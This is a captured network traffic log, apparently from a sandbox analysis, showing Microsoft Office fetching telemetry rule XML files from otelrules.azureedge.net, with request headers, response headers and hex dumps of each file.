2024-12-07 11:59:54 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:54 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:54 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: ef8e0549-001e-0066-1d03-48561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115954Z-r1cf579d778w59f9hC1EWRze6w00000002m0000000001epa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:54 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.7	49816	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:54 UTC	191	OUT	GET /rules/rule90401v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:54 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:54 GMT Content-Type: text/xml Content-Length: 1250 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE4487AA" x-ms-request-id: 5b9ff148-a01e-000d-0606-48d1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115954Z-r1cf579d778lntp7hC1EWR9gg400000001q0000000003kfy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:54 UTC	1250	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.7	49817	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:54 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:54 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: a85144f8-201e-0033-7f03-48b167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115954Z-r1cf579d778t5c2lhC1EWRce3w00000002xg000000003avy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:55 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.7	49818	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:55 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:55 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 8a7a9c83-801e-0078-4106-48bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115955Z-r1cf579d778t6txphC1EWRsd4400000002u0000000001y2z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:55 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.7	49819	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:56 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:56 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:56 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 3fcff9c6-e01e-0052-0a03-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115956Z-r1cf579d7788pwqzhC1EWRrpd800000002g0000000003fpt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:56 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.7	49820	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:56 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:57 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:57 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 49b561ed-d01e-0065-2706-48b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115957Z-r1cf579d778dc6d7hC1EWR2vs800000002w0000000003xrv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:57 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.7	49821	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:56 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:57 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:57 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 44286e75-701e-0032-5705-48a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115957Z-r1cf579d778qgtz2hC1EWRmgks000000024g000000001xy6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:57 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.7	49822	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:56 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:57 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:57 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 32ce5259-b01e-003e-4804-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115957Z-r1cf579d7782ctslhC1EWRfbrw00000002u0000000001dw3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:57 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.7	49823	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:57 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:57 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:57 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 1ccbfaf0-201e-0003-3306-48f85a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115957Z-r1cf579d778t5c2lhC1EWRce3w00000002xg000000003axn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:57 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.7	49824	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:58 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:59 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:59 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 8eb9891a-501e-005b-7103-48d7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115959Z-r1cf579d778z4wflhC1EWRa3h0000000029g000000003478 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-07 11:59:59 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.7	49825	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:59 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:59 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 83446ce3-101e-0046-0a10-4891b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115959Z-r1cf579d778mvsklhC1EWRkavg00000002kg0000000022w1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:59 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.7	49826	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:59 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:59 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 1ec3a3fb-701e-0001-7303-48b110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115959Z-r1cf579d77898tqwhC1EWRf9q80000000290000000003e09 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
